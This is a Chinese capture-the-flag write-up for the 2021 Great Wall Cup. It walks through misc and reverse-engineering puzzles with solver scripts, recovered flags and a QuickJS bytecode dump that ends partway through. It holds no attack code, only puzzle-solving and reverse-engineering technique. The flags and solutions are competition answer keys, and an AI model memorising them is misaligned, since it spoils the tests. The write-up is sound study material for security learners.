2021第一届长城杯网络安全大赛WP

第一届“长城杯”网络安全大赛 - 院校组 - 不是睡就是吃 WP

成绩

Misc

签到

16进制的ascii+base64,手速是吧,直接一血。

flag{Welcome_to_changchengbe1}

你这flag保熟吗

前面不说了,两张图片尾部都有rar,提取出来一个hint和一个password的表格,hint给了16位的base64,加密之后和表格比较,发现

(别问为什么模糊,问就是因为先在CSDN写的)

哦~,原来是希尔伯特曲线
观察和写脚本经历了长达1个多小时的斗争。
用希尔伯特曲线来提取此表格的脚本如下。(根据百度)

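from hilbertcurve.hilbertcurve import HilbertCurve
import xlrd

# Read password.xls along a 2-D Hilbert curve and concatenate the cell
# contents in curve order; the result is the base64 blob for the next step.
readbook = xlrd.open_workbook('password.xls')
sheet = readbook.sheet_by_index(0)

# NOTE(review): an order-17 curve is built but only the first 65536
# (= 256 * 256) distances are walked.  This is what the writeup used; confirm
# it matches the sheet's dimensions before reusing on another table.
hilbert_curve = HilbertCurve(17, 2)

cells = []
for dist in range(65536):
    # point_from_distance gives (x, y); the original treats the first
    # coordinate as the row and the second as the column.
    row, col = hilbert_curve.point_from_distance(dist)
    cells.append(sheet.cell(row, col).value)

# Join once instead of repeated str += (quadratic), and let the context
# manager close the file -- the original never closed its handle.
base64 = ''.join(cells)
with open('base64.txt', 'w') as f:  # 'w' suffices: nothing is read back
    f.write(base64)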

然后将base64,n次解码

(别问为什么有水印,问就是因为先写的CSDN)

密码为1f_y0u_h4ve_7he_fllllllag,_I_muSt_vvant_1t!
解压rar,得到flag.php
brainfuck,但是怎么弄都是输出error,障眼法是吧。
观察了之后发现前面所有的.(点)都被出题人删了,而作用是输出指针指向的单元内容,所以前面那一长串都无法输出,值只能被保留在对应单元中。
好在github搜brainfuck第一个就可以看到每个单元里面的信息,虽然写脚本也行,但是人都挺懒
https://fatiherikli.github.io/brainfuck-visualizer
用这个,勾选上Optimize?,delay调到最低
但是其实你还会发现一个问题,单元格只有20多个,额外的没法输出
这时只需要凭感觉将前面部分去掉,然后重新跑就行,找交集就能知道整个链子应该是哪样的了
得到
s = [117,111,122,116,123,83,114,82,121,118,105,103,95,88,102,105,101,118,95,49,72,95,52,95,101,101,48,109,119,118,105,117,102,33,95,120,102,105,101,118,125]
然后输出发现是uozt{SrRyvig_Xfiev_1H_4_ee0mwviuf!_xfiev}
然后atbash

flag{HiIbert_Curve_1S_4_vv0nderfu!_curve}

re

Just_cmp-re

类原题的改编题
[Zer0pts2020]easy strcmp
自己跟着复现这道题就完事
脚本如下

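import binascii  # kept from the original script; recover_flag no longer needs it

enc = 'flag{********************************}'
m = [0x0A07370000000000, 0x380B06060A080A37, 0x3B0F0E38083B0A07, 0x373B0709060B0A3A, 0x0F38070F0D]


def recover_flag(enc, m):
    """Rebuild the flag for the [Zer0pts2020] easy strcmp variant.

    ``enc`` is a placeholder string of the right length ("flag{" + 32 * "*"
    + "}") and ``m`` the per-chunk addends taken from the binary.  Each
    8-character chunk is read as a little-endian integer, ``m[i]`` is added,
    and the sum is written back little-endian at the chunk's width.

    This is the same arithmetic as the original reverse-hex trick, but
    ``int.from_bytes``/``to_bytes`` keep the width explicit: ``hex()`` can
    yield an odd-length string that ``a2b_hex`` rejects.  Raises
    ``OverflowError`` if an addition carries past the chunk width (the hex
    trick would have silently grown the output instead).  Prints each
    recovered chunk (debug, as the original did) and returns the flag bytes.
    """
    out = []
    for i, addend in enumerate(m):
        chunk = enc[i * 8:(i + 1) * 8].encode('ascii')
        word = int.from_bytes(chunk, 'little') + addend
        piece = word.to_bytes(len(chunk), 'little')
        print(piece)
        out.append(piece)
    return b''.join(out)


flag = recover_flag(enc, m)
print(flag)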

flag{a14a424005b14e2b89ed45031ea791b9}

Funny_js

该题WP来自战队成员,未参加本次比赛团队解题,放出WP供于学习 来自1u1u

考点:quickjs、bytecode 、rc4.

quickjs写的程序。

下载源码,注意版本要为 quickjs-2020-01-19.tar.xz

然后解压后要修改 quickjs.c 里面的源码,使其在加载字节码时把字节码(含 opcode 反汇编)打印出来,后面的 1.txt 就是这份输出。

先编译一个.c程序

在example里面有样本js文件,进到该目录,

qjsc -e -o hello.c hello.js

得到hello.c文件

/* File generated automatically by the QuickJS compiler. */

#include "quickjs-libc.h"

/*
 * Sample qjsc output for example/hello.js.  The atom table is readable in
 * plain ASCII ("console", "log", "Hello World", "hello.js"), followed by the
 * compiled <eval> function.  This array is only here to obtain the template
 * main() below; it gets replaced by the challenge bytecode later.
 */
const uint32_t qjsc_hello_size = 78;

const uint8_t qjsc_hello[78] = {
0x02, 0x04, 0x0e, 0x63, 0x6f, 0x6e, 0x73, 0x6f,
0x6c, 0x65, 0x06, 0x6c, 0x6f, 0x67, 0x16, 0x48,
0x65, 0x6c, 0x6c, 0x6f, 0x20, 0x57, 0x6f, 0x72,
0x6c, 0x64, 0x10, 0x68, 0x65, 0x6c, 0x6c, 0x6f,
0x2e, 0x6a, 0x73, 0x0e, 0x00, 0x06, 0x00, 0x9e,
0x01, 0x00, 0x01, 0x00, 0x03, 0x00, 0x00, 0x14,
0x01, 0xa0, 0x01, 0x00, 0x00, 0x00, 0x39, 0xdf,
0x00, 0x00, 0x00, 0x43, 0xe0, 0x00, 0x00, 0x00,
0x04, 0xe1, 0x00, 0x00, 0x00, 0x24, 0x01, 0x00,
0xcf, 0x28, 0xc4, 0x03, 0x01, 0x00,
};

/*
 * Stock entry point as emitted by `qjsc -e` for hello.js: create a runtime,
 * add the intrinsics one by one on a raw context, run the embedded
 * bytecode, tear everything down.  It is kept exactly as generated so the
 * bytecode runs in the environment it was compiled for.
 *
 * NOTE(review): QuickJS makes no promise that its bytecode loader rejects
 * malformed input, and the blob gets Eval, module loading and the std
 * helpers here -- run unknown CTF bytecode like this in a throwaway VM.
 */
int main(int argc, char **argv)
{
    JSRuntime *rt;
    JSContext *ctx;
    rt = JS_NewRuntime();
    ctx = JS_NewContextRaw(rt);  /* raw context: intrinsics are added explicitly below */
    JS_SetModuleLoaderFunc(rt, NULL, js_module_loader, NULL);
    JS_AddIntrinsicBaseObjects(ctx);
    JS_AddIntrinsicDate(ctx);
    JS_AddIntrinsicEval(ctx);
    JS_AddIntrinsicStringNormalize(ctx);
    JS_AddIntrinsicRegExp(ctx);
    JS_AddIntrinsicJSON(ctx);
    JS_AddIntrinsicProxy(ctx);
    JS_AddIntrinsicMapSet(ctx);
    JS_AddIntrinsicTypedArrays(ctx);
    JS_AddIntrinsicPromise(ctx);
    JS_AddIntrinsicBigInt(ctx);
    js_std_add_helpers(ctx, argc, argv);  /* print(), scriptArgs, ... */
    /* Loads and runs the blob (flags = 0).  Per the writeup, the patched
       quickjs.c prints the bytecode dump during this load. */
    js_std_eval_binary(ctx, qjsc_hello, qjsc_hello_size, 0);
    js_std_loop(ctx);  /* std event loop: pending jobs/timers */
    JS_FreeContext(ctx);
    JS_FreeRuntime(rt);
    return 0;
}

然后从题目文件中拷贝出 qjsc_s 数组,并数清它的字节个数:数组声明的大小必须和实际字节数一致,偏小会丢掉末尾字节,偏大则会把补零的尾巴当成字节码喂给加载器。

修改上面的代码

最终

hello.c

#include "quickjs-libc.h"

/*
 * qjsc_s from the challenge binary, renamed so the stock qjsc template
 * compiles unchanged.  The leading atom table is readable in ASCII:
 * "rc4", the RC4 key "2021quickjs_happygame" (the 0x32 0x30 0x32 0x31
 * 0x71 ... run) and the 36-character "****..." placeholder that stands in
 * for the flag.  The declared length (1164) must equal the number of bytes
 * listed: a mismatch either drops trailing bytes or hands zero padding to
 * js_std_eval_binary as bytecode.
 */
const uint32_t qjsc_hello_size = 1164;

const uint8_t qjsc_hello[1164] = {
0x02, 0x1B, 0x06, 0x72, 0x63, 0x34, 0x04, 0x73, 0x6E, 0x02,
0x69, 0x02, 0x6A, 0x02, 0x6B, 0x02, 0x6C, 0x02, 0x6D, 0x02,
0x6E, 0x04, 0x75, 0x6E, 0x06, 0x61, 0x72, 0x72, 0x0C, 0x63,
0x69, 0x70, 0x68, 0x65, 0x72, 0x2A, 0x32, 0x30, 0x32, 0x31,
0x71, 0x75, 0x69, 0x63, 0x6B, 0x6A, 0x73, 0x5F, 0x68, 0x61,
0x70, 0x70, 0x79, 0x67, 0x61, 0x6D, 0x65, 0x48, 0x2A, 0x2A,
0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A, 0x2A,
0x2A, 0x2A, 0x2A, 0x2A, 0x02, 0x73, 0x18, 0x66, 0x72, 0x6F,
0x6D, 0x43, 0x68, 0x61, 0x72, 0x43, 0x6F, 0x64, 0x65, 0x0A,
0x70, 0x72, 0x69, 0x6E, 0x74, 0x12, 0x73, 0x6F, 0x75, 0x72,
0x63, 0x65, 0x2E, 0x6A, 0x73, 0x08, 0x64, 0x61, 0x74, 0x61,
0x06, 0x6B, 0x65, 0x79, 0x06, 0x62, 0x6F, 0x78, 0x02, 0x78,
0x08, 0x74, 0x65, 0x6D, 0x70, 0x02, 0x79, 0x06, 0x6F, 0x75,
0x74, 0x08, 0x63, 0x6F, 0x64, 0x65, 0x14, 0x63, 0x68, 0x61,
0x72, 0x43, 0x6F, 0x64, 0x65, 0x41, 0x74, 0x08, 0x70, 0x75,
0x73, 0x68, 0x0E, 0x00, 0x06, 0x00, 0x9E, 0x01, 0x00, 0x01,
0x00, 0x20, 0x00, 0x08, 0xEB, 0x04, 0x01, 0xA0, 0x01, 0x00,
0x00, 0x00, 0x40, 0xDF, 0x00, 0x00, 0x00, 0x40, 0x40, 0xE0,
0x00, 0x00, 0x00, 0x00, 0x40, 0xE1, 0x00, 0x00, 0x00, 0x00,
0x40, 0xE2, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE3, 0x00, 0x00,
0x00, 0x00, 0x40, 0xE4, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE5,
0x00, 0x00, 0x00, 0x00, 0x40, 0xE6, 0x00, 0x00, 0x00, 0x00,
0x40, 0xE7, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE8, 0x00, 0x00,
0x00, 0x00, 0x40, 0xE9, 0x00, 0x00, 0x00, 0x00, 0x40, 0xE1,
0x00, 0x00, 0x00, 0x00, 0xC2, 0x00, 0x41, 0xDF, 0x00, 0x00,
0x00, 0x00, 0x3F, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE1,
0x00, 0x00, 0x00, 0x00, 0x3F, 0xE2, 0x00, 0x00, 0x00, 0x00,
0x3F, 0xE3, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE4, 0x00, 0x00,
0x00, 0x00, 0x3F, 0xE5, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE6,
0x00, 0x00, 0x00, 0x00, 0x3F, 0xE7, 0x00, 0x00, 0x00, 0x00,
0x3F, 0xE8, 0x00, 0x00, 0x00, 0x00, 0x3F, 0xE9, 0x00, 0x00,
0x00, 0x00, 0x3F, 0xE1, 0x00, 0x00, 0x00, 0x00, 0x04, 0xEA,
0x00, 0x00, 0x00, 0x11, 0x3A, 0xE7, 0x00, 0x00, 0x00, 0x0E,
0x04, 0xEB, 0x00, 0x00, 0x00, 0x11, 0x3A, 0xE0, 0x00, 0x00,
0x00, 0xCB, 0xC0, 0x96, 0x00, 0xC0, 0xE0, 0x00, 0xC0, 0xF4,
0x00, 0xBF, 0x44, 0xBF, 0x3D, 0xBF, 0x7D, 0xBF, 0x08, 0xC0,
0xEF, 0x00, 0xC0, 0xCB, 0x00, 0xC0, 0xFE, 0x00, 0xC0, 0xF1,
0x00, 0xBF, 0x71, 0xC0, 0xD5, 0x00, 0xC0, 0xB0, 0x00, 0xBF,
0x40, 0xBF, 0x6A, 0xBF, 0x67, 0xC0, 0xA6, 0x00, 0xC0, 0xB9,
0x00, 0xC0, 0x9F, 0x00, 0xC0, 0x9E, 0x00, 0xC0, 0xAC, 0x00,
0xBF, 0x09, 0xC0, 0xD5, 0x00, 0xC0, 0xEF, 0x00, 0xBF, 0x0C,
0xBF, 0x64, 0xC0, 0xB9, 0x00, 0xBF, 0x5A, 0xC0, 0xAE, 0x00,
0xBF, 0x6B, 0xC0, 0x83, 0x00, 0x26, 0x20, 0x00, 0xC0, 0xDF,
0x00, 0x4D, 0x20, 0x00, 0x00, 0x80, 0xBF, 0x7A, 0x4D, 0x21,
0x00, 0x00, 0x80, 0xC0, 0xE5, 0x00, 0x4D, 0x22, 0x00, 0x00,
0x80, 0xC0, 0x9D, 0x00, 0x4D, 0x23, 0x00, 0x00, 0x80, 0x11,
0x3A, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0xC1, 0x01, 0x11, 0x3A,
0xE5, 0x00, 0x00, 0x00, 0xCB, 0xC1, 0x02, 0x11, 0x3A, 0xE6,
0x00, 0x00, 0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE4, 0x00, 0x00,
0x00, 0xCB, 0xB7, 0x11, 0x3A, 0xE3, 0x00, 0x00, 0x00, 0xCB,
0x39, 0xDF, 0x00, 0x00, 0x00, 0x39, 0xE0, 0x00, 0x00, 0x00,
0x39, 0xE7, 0x00, 0x00, 0x00, 0xF2, 0x11, 0x3A, 0xE9, 0x00,
0x00, 0x00, 0x0E, 0x06, 0xCB, 0xB7, 0x11, 0x3A, 0xE1, 0x00,
0x00, 0x00, 0x0E, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x39, 0xE9,
0x00, 0x00, 0x00, 0xEB, 0xA5, 0xEC, 0x6E, 0x39, 0xE9, 0x00,
0x00, 0x00, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x48, 0x11, 0x3A,
0xE2, 0x00, 0x00, 0x00, 0xCB, 0x39, 0xE2, 0x00, 0x00, 0x00,
0xBF, 0x38, 0xBF, 0x11, 0xA0, 0xB0, 0x11, 0x3A, 0xE4, 0x00,
0x00, 0x00, 0xCB, 0x06, 0xCB, 0x39, 0xE4, 0x00, 0x00, 0x00,
0x39, 0xE8, 0x00, 0x00, 0x00, 0x39, 0xE3, 0x00, 0x00, 0x00,
0x48, 0xAB, 0xEC, 0x0F, 0x39, 0xE5, 0x00, 0x00, 0x00, 0x93,
0x3A, 0xE5, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0x0D, 0x39, 0xE6,
0x00, 0x00, 0x00, 0x93, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB,
0x39, 0xE3, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE3, 0x00, 0x00,
0x00, 0xCB, 0x39, 0xE1, 0x00, 0x00, 0x00, 0x93, 0x3A, 0xE1,
0x00, 0x00, 0x00, 0x0E, 0xEE, 0x86, 0x06, 0xCB, 0x39, 0xE5,
0x00, 0x00, 0x00, 0x39, 0xE9, 0x00, 0x00, 0x00, 0xEB, 0xAB,
0xEC, 0x15, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xB7, 0xAB, 0xEC,
0x0C, 0xC1, 0x03, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB,
0xEE, 0x0A, 0xC1, 0x04, 0x11, 0x3A, 0xE6, 0x00, 0x00, 0x00,
0xCB, 0xC3, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00, 0xCB, 0x06,
0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x05, 0xA7, 0xEC,
0x3A, 0x39, 0xEC, 0x00, 0x00, 0x00, 0x39, 0x97, 0x00, 0x00,
0x00, 0x43, 0xED, 0x00, 0x00, 0x00, 0x39, 0x96, 0x00, 0x00,
0x00, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x06, 0x9E, 0xF1,
0x24, 0x01, 0x00, 0x9F, 0x11, 0x3A, 0xEC, 0x00, 0x00, 0x00,
0xCB, 0x39, 0xE6, 0x00, 0x00, 0x00, 0xC1, 0x07, 0x9D, 0x11,
0x3A, 0xE6, 0x00, 0x00, 0x00, 0xCB, 0xEE, 0xBE, 0x39, 0xEE,
0x00, 0x00, 0x00, 0x39, 0xEC, 0x00, 0x00, 0x00, 0xF1, 0xCF,
0x28, 0xDE, 0x03, 0x01, 0x20, 0x00, 0x48, 0x01, 0x00, 0x4A,
0x52, 0x3F, 0x40, 0x00, 0x7C, 0x04, 0x30, 0x30, 0x2B, 0x2B,
0x77, 0x7B, 0x5D, 0x5D, 0x6C, 0x3F, 0x0E, 0x40, 0x3F, 0x4A,
0xB7, 0x30, 0x2B, 0x3F, 0xCB, 0x4E, 0x0D, 0x0E, 0x43, 0x06,
0x00, 0xBE, 0x03, 0x02, 0x08, 0x02, 0x05, 0x00, 0x00, 0xBB,
0x01, 0x0A, 0xE0, 0x03, 0x00, 0x01, 0x00, 0xE2, 0x03, 0x00,
0x01, 0x00, 0xE4, 0x03, 0x00, 0x00, 0x00, 0xC2, 0x03, 0x00,
0x01, 0x00, 0xE6, 0x03, 0x00, 0x02, 0x00, 0xE8, 0x03, 0x00,
0x03, 0x00, 0xEA, 0x03, 0x00, 0x04, 0x00, 0xEC, 0x03, 0x00,
0x05, 0x00, 0xEE, 0x03, 0x00, 0x06, 0x00, 0xC6, 0x03, 0x00,
0x07, 0x00, 0x39, 0x94, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x01,
0xF1, 0xCB, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC,
0x09, 0xC7, 0xC8, 0xC8, 0x4A, 0x95, 0x01, 0xEE, 0xF2, 0xB7,
0xCD, 0xB7, 0xCC, 0xC8, 0xC0, 0x00, 0x01, 0xA5, 0xEC, 0x2C,
0xC9, 0xC7, 0xC8, 0x48, 0x9F, 0xD4, 0x43, 0xF8, 0x00, 0x00,
0x00, 0xC8, 0xD4, 0xEB, 0x9E, 0x24, 0x01, 0x00, 0x9F, 0xC0,
0x00, 0x01, 0x9E, 0xCD, 0xC7, 0xC8, 0x48, 0xCE, 0xC7, 0xC8,
0x72, 0xC7, 0xC9, 0x48, 0x4A, 0xC7, 0xC9, 0xCA, 0x4A, 0x95,
0x01, 0xEE, 0xCF, 0xB7, 0xCD, 0xB7, 0xC5, 0x04, 0x26, 0x00,
0x00, 0xC5, 0x05, 0xB7, 0xCC, 0xC8, 0xD3, 0xEB, 0xA5, 0xEC,
0x56, 0xD3, 0x43, 0xF8, 0x00, 0x00, 0x00, 0xC8, 0x24, 0x01,
0x00, 0xC5, 0x06, 0xC9, 0xB8, 0x9F, 0xC0, 0x00, 0x01, 0x9E,
0xCD, 0xC4, 0x04, 0xC7, 0xC9, 0x48, 0x9F, 0xC0, 0x00, 0x01,
0x9E, 0xC5, 0x04, 0xC7, 0xC9, 0x48, 0xCE, 0xC7, 0xC9, 0x72,
0xC7, 0xC4, 0x04, 0x48, 0x4A, 0xC7, 0xC4, 0x04, 0xCA, 0x4A,
0xC7, 0xC9, 0x48, 0xC7, 0xC4, 0x04, 0x48, 0x9F, 0xC0, 0x00,
0x01, 0x9E, 0xC5, 0x07, 0xC4, 0x05, 0x43, 0xF9, 0x00, 0x00,
0x00, 0xC4, 0x06, 0xC7, 0xC4, 0x07, 0x48, 0xB0, 0x24, 0x01,
0x00, 0x0E, 0x95, 0x01, 0xEE, 0xA6, 0xC4, 0x05, 0x28, 0xDE,
0x03, 0x03, 0x19, 0x04, 0x35, 0x30, 0x17, 0x18, 0x0D, 0x30,
0x7B, 0x17, 0x26, 0x17, 0x19, 0x0D, 0x12, 0x1C, 0x2C, 0x40,
0x2B, 0x3F, 0x17, 0x2B, 0x1D, 0x4A, 0x5D, 0x17, 0x0A, 0x00,
0x0A, 0x00, 0x0A, 0xE8, 0x01, 0x07, 0x44, 0xB8, 0x90, 0xB5,
0x6B, 0x67, 0x80, 0x0A, 0xE8, 0x01, 0x07, 0x34, 0xA7, 0xB8,
0x48, 0x7F, 0x8D, 0xAF, 0x0A, 0x00, 0x0A, 0x28, 0x01, 0xFE,
0x0A, 0x28, 0x01,0xfe
};

/*
 * Same template main() as the hello.js sample, untouched: only the byte
 * array above was swapped for the challenge blob.  Create a runtime, add
 * the intrinsics on a raw context, load and run the bytecode, tear down.
 * Per the writeup the patched quickjs.c prints the bytecode dump (1.txt)
 * while js_std_eval_binary loads it.
 *
 * NOTE(review): QuickJS makes no promise that its bytecode loader rejects
 * malformed input, and the challenge blob gets Eval, module loading and
 * the std helpers here -- run unknown CTF bytecode in a throwaway VM.
 */
int main(int argc, char **argv)
{
    JSRuntime *rt;
    JSContext *ctx;
    rt = JS_NewRuntime();
    ctx = JS_NewContextRaw(rt);  /* raw context: intrinsics are added explicitly below */
    JS_SetModuleLoaderFunc(rt, NULL, js_module_loader, NULL);
    JS_AddIntrinsicBaseObjects(ctx);
    JS_AddIntrinsicDate(ctx);
    JS_AddIntrinsicEval(ctx);
    JS_AddIntrinsicStringNormalize(ctx);
    JS_AddIntrinsicRegExp(ctx);
    JS_AddIntrinsicJSON(ctx);
    JS_AddIntrinsicProxy(ctx);
    JS_AddIntrinsicMapSet(ctx);
    JS_AddIntrinsicTypedArrays(ctx);
    JS_AddIntrinsicPromise(ctx);
    JS_AddIntrinsicBigInt(ctx);  /* the blob uses BigInt constants (see cpool in the dump) */
    js_std_add_helpers(ctx, argc, argv);  /* print(), scriptArgs, ... */
    /* Loads and runs the blob (flags = 0); the dump is produced here. */
    js_std_eval_binary(ctx, qjsc_hello, qjsc_hello_size, 0);
    js_std_loop(ctx);  /* std event loop: pending jobs/timers */
    JS_FreeContext(ctx);
    JS_FreeRuntime(rt);
    return 0;
}

然后使用编译

gcc -ggdb hello.c libquickjs.a -lm -ldl -lpthread

得到一个a.out 文件

把输出重定向到一个文件里,方便慢慢看

./a.out >1.txt

得到

1.txt

0000:  02 1b                    27 atom indexes {
0002: 06 72 63 34 string: 1"rc4"
0006: 04 73 6e string: 1"sn"
0009: 02 69 string: 1"i"
000b: 02 6a string: 1"j"
000d: 02 6b string: 1"k"
000f: 02 6c string: 1"l"
0011: 02 6d string: 1"m"
0013: 02 6e string: 1"n"
0015: 04 75 6e string: 1"un"
0018: 06 61 72 72 string: 1"arr"
001c: 0c 63 69 70 68 65 72 string: 1"cipher"
0023: 2a 32 30 32 31 71 75 69
63 6b 6a 73 5f 68 61 70
70 79 67 61 6d 65 string: 1"2021quickjs_happygame"
0039: 48 2a 2a 2a 2a 2a 2a 2a
2a 2a 2a 2a 2a 2a 2a 2a
2a 2a 2a 2a 2a 2a 2a 2a
2a 2a 2a 2a 2a 2a 2a 2a
2a 2a 2a 2a 2a string: 1"************************************"
005e: 02 73 string: 1"s"
0060: 18 66 72 6f 6d 43 68 61
72 43 6f 64 65 string: 1"fromCharCode"
006d: 0a 70 72 69 6e 74 string: 1"print"
0073: 12 73 6f 75 72 63 65 2e
6a 73 string: 1"source.js"
007d: 08 64 61 74 61 string: 1"data"
0082: 06 6b 65 79 string: 1"key"
0086: 06 62 6f 78 string: 1"box"
008a: 02 78 string: 1"x"
008c: 08 74 65 6d 70 string: 1"temp"
0091: 02 79 string: 1"y"
0093: 06 6f 75 74 string: 1"out"
0097: 08 63 6f 64 65 string: 1"code"
009c: 14 63 68 61 72 43 6f 64
65 41 74 string: 1"charCodeAt"
00a7: 08 70 75 73 68 string: 1"push"
}
00ac: 0e function {
00ad: 00 06 00 9e 01 00 01 00
20 00 08 eb 04 01 name: "<eval>"
args=0 vars=1 defargs=0 closures=0 cpool=8
stack=32 bclen=619 locals=1
vars {
00bb: a0 01 00 00 00 name: "<ret>"
}
bytecode {
00c0: 40 df 00 00 00 40 40 e0
00 00 00 00 40 e1 00 00
00 00 40 e2 00 00 00 00
40 e3 00 00 00 00 40 e4
00 00 00 00 40 e5 00 00
00 00 40 e6 00 00 00 00
40 e7 00 00 00 00 40 e8
00 00 00 00 40 e9 00 00
00 00 40 e1 00 00 00 00
c2 00 41 df 00 00 00 00
3f e0 00 00 00 00 3f e1
00 00 00 00 3f e2 00 00
00 00 3f e3 00 00 00 00
3f e4 00 00 00 00 3f e5
00 00 00 00 3f e6 00 00
00 00 3f e7 00 00 00 00
3f e8 00 00 00 00 3f e9
00 00 00 00 3f e1 00 00
00 00 04 ea 00 00 00 11
3a e7 00 00 00 0e 04 eb
00 00 00 11 3a e0 00 00
00 cb c0 96 00 c0 e0 00
c0 f4 00 bf 44 bf 3d bf
7d bf 08 c0 ef 00 c0 cb
00 c0 fe 00 c0 f1 00 bf
71 c0 d5 00 c0 b0 00 bf
40 bf 6a bf 67 c0 a6 00
c0 b9 00 c0 9f 00 c0 9e
00 c0 ac 00 bf 09 c0 d5
00 c0 ef 00 bf 0c bf 64
c0 b9 00 bf 5a c0 ae 00
bf 6b c0 83 00 26 20 00
c0 df 00 4d 20 00 00 80
bf 7a 4d 21 00 00 80 c0
e5 00 4d 22 00 00 80 c0
9d 00 4d 23 00 00 80 11
3a e8 00 00 00 0e c1 01
11 3a e5 00 00 00 cb c1
02 11 3a e6 00 00 00 cb
b7 11 3a e4 00 00 00 cb
b7 11 3a e3 00 00 00 cb
39 df 00 00 00 39 e0 00
00 00 39 e7 00 00 00 f2
11 3a e9 00 00 00 0e 06
cb b7 11 3a e1 00 00 00
0e 39 e1 00 00 00 39 e9
00 00 00 eb a5 ec 6e 39
e9 00 00 00 39 e1 00 00
00 48 11 3a e2 00 00 00
cb 39 e2 00 00 00 bf 38
bf 11 a0 b0 11 3a e4 00
00 00 cb 06 cb 39 e4 00
00 00 39 e8 00 00 00 39
e3 00 00 00 48 ab ec 0f
39 e5 00 00 00 93 3a e5
00 00 00 cb ee 0d 39 e6
00 00 00 93 3a e6 00 00
00 cb 39 e3 00 00 00 93
3a e3 00 00 00 cb 39 e1
00 00 00 93 3a e1 00 00
00 0e ee 86 06 cb 39 e5
00 00 00 39 e9 00 00 00
eb ab ec 15 39 e6 00 00
00 b7 ab ec 0c c1 03 11
3a e6 00 00 00 cb ee 0a
c1 04 11 3a e6 00 00 00
cb c3 11 3a ec 00 00 00
cb 06 cb 39 e6 00 00 00
c1 05 a7 ec 3a 39 ec 00
00 00 39 97 00 00 00 43
ed 00 00 00 39 96 00 00
00 39 e6 00 00 00 c1 06
9e f1 24 01 00 9f 11 3a
ec 00 00 00 cb 39 e6 00
00 00 c1 07 9d 11 3a e6
00 00 00 cb ee be 39 ee
00 00 00 39 ec 00 00 00
f1 cf 28 at 1, fixup atom: rc4
at 7, fixup atom: sn
at 13, fixup atom: i
at 19, fixup atom: j
at 25, fixup atom: k
at 31, fixup atom: l
at 37, fixup atom: m
at 43, fixup atom: n
at 49, fixup atom: un
at 55, fixup atom: arr
at 61, fixup atom: cipher
at 67, fixup atom: i
at 75, fixup atom: rc4
at 81, fixup atom: sn
at 87, fixup atom: i
at 93, fixup atom: j
at 99, fixup atom: k
at 105, fixup atom: l
at 111, fixup atom: m
at 117, fixup atom: n
at 123, fixup atom: un
at 129, fixup atom: arr
at 135, fixup atom: cipher
at 141, fixup atom: i
at 147, fixup atom: "2021quickjs_happygame"
at 153, fixup atom: un
at 159, fixup atom: "************************************"
at 165, fixup atom: sn
at 260, fixup atom: "32"
at 267, fixup atom: "33"
at 275, fixup atom: "34"
at 283, fixup atom: "35"
at 289, fixup atom: arr
at 298, fixup atom: m
at 307, fixup atom: n
at 315, fixup atom: l
at 323, fixup atom: k
at 329, fixup atom: rc4
at 334, fixup atom: sn
at 339, fixup atom: un
at 346, fixup atom: cipher
at 356, fixup atom: i
at 362, fixup atom: i
at 367, fixup atom: cipher
at 376, fixup atom: cipher
at 381, fixup atom: i
at 388, fixup atom: j
at 394, fixup atom: j
at 406, fixup atom: l
at 414, fixup atom: l
at 419, fixup atom: arr
at 424, fixup atom: k
at 433, fixup atom: m
at 439, fixup atom: m
at 447, fixup atom: n
at 453, fixup atom: n
at 459, fixup atom: k
at 465, fixup atom: k
at 471, fixup atom: i
at 477, fixup atom: i
at 487, fixup atom: m
at 492, fixup atom: cipher
at 501, fixup atom: n
at 513, fixup atom: n
at 524, fixup atom: n
at 532, fixup atom: s
at 540, fixup atom: n
at 550, fixup atom: s
at 555, fixup atom: String
at 560, fixup atom: fromCharCode
at 565, fixup atom: Number
at 570, fixup atom: n
at 584, fixup atom: s
at 590, fixup atom: n
at 599, fixup atom: n
at 607, fixup atom: print
at 612, fixup atom: s
}
debug {
032b: de 03 01 20 00 48 01 00
4a 52 3f 40 00 7c 04 30
30 2b 2b 77 7b 5d 5d 6c
3f 0e 40 3f 4a b7 30 2b
3f cb 4e 0d filename: "source.js"
}
cpool {
034f: 0e function {
0350: 43 06 00 be 03 02 08 02
05 00 00 bb 01 0a name: rc4
args=2 vars=8 defargs=2 closures=0 cpool=0
stack=5 bclen=187 locals=10
vars {
035e: e0 03 00 01 00 name: data
0363: e2 03 00 01 00 name: key
0368: e4 03 00 00 00 name: box
036d: c2 03 00 01 00 name: i
0372: e6 03 00 02 00 name: x
0377: e8 03 00 03 00 name: temp
037c: ea 03 00 04 00 name: y
0381: ec 03 00 05 00 name: out
0386: ee 03 00 06 00 name: code
038b: c6 03 00 07 00 name: k
}
bytecode {
0390: 39 94 00 00 00 c0 00 01
f1 cb b7 cc c8 c0 00 01
a5 ec 09 c7 c8 c8 4a 95
01 ee f2 b7 cd b7 cc c8
c0 00 01 a5 ec 2c c9 c7
c8 48 9f d4 43 f8 00 00
00 c8 d4 eb 9e 24 01 00
9f c0 00 01 9e cd c7 c8
48 ce c7 c8 72 c7 c9 48
4a c7 c9 ca 4a 95 01 ee
cf b7 cd b7 c5 04 26 00
00 c5 05 b7 cc c8 d3 eb
a5 ec 56 d3 43 f8 00 00
